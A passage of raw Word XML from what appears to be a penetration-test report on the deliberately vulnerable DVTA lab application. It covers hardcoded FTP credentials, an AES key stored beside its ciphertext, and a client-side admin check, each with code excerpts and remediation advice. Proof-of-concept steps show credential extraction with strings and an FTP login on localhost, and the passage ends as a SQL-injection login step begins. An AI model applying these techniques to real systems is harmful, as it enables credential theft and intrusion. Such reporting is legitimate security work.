        <w:tblStyle w:val="Table11"/>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0C2">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Admin.cs  Line 43  (btnFtp_Click)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C3">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Admin.Upload("ftp://" + this.ftpserver,</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C4">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"dvta",       // </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">←</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> HARDCODED FTP USERNAME</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C5">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"p@ssw0rd",   // </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">←</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="ff6b6b"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> HARDCODED FTP PASSWORD</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C6">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pathtodownload + "admin.csv");</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C7">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Also: DVTA.exe.config: &lt;add key="FTPPassword" value="password" /&gt;  (plaintext)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000C8">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C9">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Proof of Concept</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CA">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Extract via strings analysis (no execution required):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CB">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strings DVTA.exe | findstr /i "pass\|dvta\|ftp"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CC">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Direct FTP authentication with extracted credentials:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CD">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ftp 127.0.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CE">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Name: dvta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000CF">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Password: password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D0">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230 Login successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D1">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ftp&gt; ls</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D2">
      <w:pPr>
        <w:spacing w:after="140" w:before="2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2"/>
          <w:szCs w:val="22"/>
          <w:shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Live Evidence — Figure 4a (F3: Hardcoded FTP Credentials)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D3">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840605" cy="2064385"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="16" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="17" name="Shape 17"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="2932048" y="2754158"/>
                          <a:ext cx="4827905" cy="205168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840605" cy="2064385"/>
                <wp:effectExtent b="0" l="0" r="0" t="0"/>
                <wp:docPr id="16"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4840605" cy="206438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D4">
      <w:pPr>
        <w:spacing w:after="20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4a — Screenshot (F3-PoC): FTP credentials extracted from the configuration file were successfully reused to authenticate directly to the FTP server (FileZilla 0.9.60, 127.0.0.1), confirming both hardcoded storage and real-world exploitability. Right: DVTA.exe.config exposing FTPUser, FTPPassword, AES key/IV, and DB credentials in plaintext XML.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D5">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2"/>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0D6">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FTP credentials are embedded as string literals at compile time. They are recoverable via static analysis of the binary without execution. Combined with CWE-319 (cleartext FTP), both the credentials and the data transmitted over FTP are exposed simultaneously.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D7">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0D8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Remove all hardcoded credentials from source code immediately; rotate FTP password</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Store FTP credentials in a secrets vault or OS credential manager, never in source or config</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>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Replace FTP with SFTP using SSH key authentication to eliminate password-based auth</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">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DC">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0DD">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3"/>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0DE">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4  —  AES Encryption Key Co-located with Ciphertext</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0E0">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CWE-321</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0E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9.1  —  Critical</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">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E3">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0E4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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DVTA.exe.config: AESKEY, IV, and DBPASSWORD (ciphertext) all in the same file</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Decryption verified: AES-256-CBC(CTsvjZ0jQghXYWbSRcPxpQ==, J8gLXc454o5tW2HEF7HahcXPufj9v8k8, fq20T0gMnXa6g0l4) = "p@ssw0rd"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Lines 16–18: all three values read from AppSettings at runtime</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">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E8">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18" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="19" name="Shape 19"/>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18"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0E9">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5 — DVTA.exe.config: AES key and IV beside ciphertext  +  decryption proof</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EA">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EB">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0EC">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application applies AES-256-CBC to the database password before storing it in config. However, the decryption key (AESKEY) and initialization vector (IV) are stored in the same configuration file as the ciphertext. Possession of the config file yields both the key and the ciphertext — reducing the effective security to zero.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table14"/>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0ED">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DVTA.exe.config (ships alongside binary)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">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&lt;add key="DBPASSWORD"  value="CTsvjZ0jQghXYWbSRcPxpQ==" /&gt;  // ciphertext</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">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&lt;add key="AESKEY"      value="J8gLXc454o5tW2HEF7HahcXPufj9v8k8" /&gt;  // KEY</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">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&lt;add key="IV"          value="fq20T0gMnXa6g0l4" /&gt;  // IV</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">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F2">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DBAccessClass.cs Line 16-18:</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">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s  = AppSettings["DBPASSWORD"];  // ciphertext</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">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s2 = AppSettings["AESKEY"];      // key — same file</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">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s3 = AppSettings["IV"];          // IV  — same file</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">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4ec994"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">// AES decrypt </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:cs="Cambria Math" w:eastAsia="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:color w:val="4ec994"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">→</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4ec994"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
                <w:shd w:fill="auto" w:val="clear"/>
                <w:vertAlign w:val="baseline"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> "p@ssw0rd"  (verified)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">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5"/>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0F8">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Encrypting the password but storing the key alongside it provides no confidentiality benefit. Any attacker who reads the config file obtains all three values needed for decryption. The decrypted SA password grants SQL Server sysadmin access, which includes xp_cmdshell — enabling OS-level command execution.</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">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0FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Store encryption keys in a separate protected location (OS keystore, HSM, or secrets vault)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Preferably use Windows DPAPI (Data Protection API) which ties key access to OS user identity</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>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Rotate the SA password immediately after this finding is remediated</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">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FE">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0FF">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6"/>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00">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5  —  Broken Access Control — Client-Side Admin Role Check</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0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CWE-284</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03">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8.8  —  Critical</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">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05">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06">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Login.cs Line 91: bool flag3 = num != 1 — admin routing based solely on DB integer</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000107">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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num = sqlDataReader.GetValue(4) — reads isadmin column directly from login result</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Admin.cs: getExpensesOfAll() called with no authorization check (Line 36)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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No server-side role validation anywhere in Admin.cs or DBAccessClass.cs</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">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0B">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19" name=""/>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:cNvPr id="20" name="Shape 20"/>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19"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0C">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6 — Login.cs Lines 91–101: admin role decision is a single integer comparison</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010D">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0E">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0F">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After login, the application reads the isadmin column value (column index 4) from the SQL result set and performs a single integer comparison to route the session to Main (regular) or Admin panel. No signed token, server-side session, or cryptographic binding exists. The check is entirely client-side.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table17"/>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110">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Login.cs  Line 82, 91-101</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">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num = (int)sqlDataReader.GetValue(4);  // isadmin from DB</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">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bool flag3 = num != 1;  // ONLY authorization check</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">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if (flag3)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">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 Main main = new Main(); main.ShowDialog(); }  // regular</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">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else</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">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 Admin admin = new Admin(); admin.ShowDialog(); } // admin</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000117">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Admin panel: getExpensesOfAll() — ALL users, no WHERE clause</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">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19">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Proof of Concept</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011A">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Step 1: Login with SQLi payload that forces isadmin = 1 in the result:</w:t>
      </w:r>
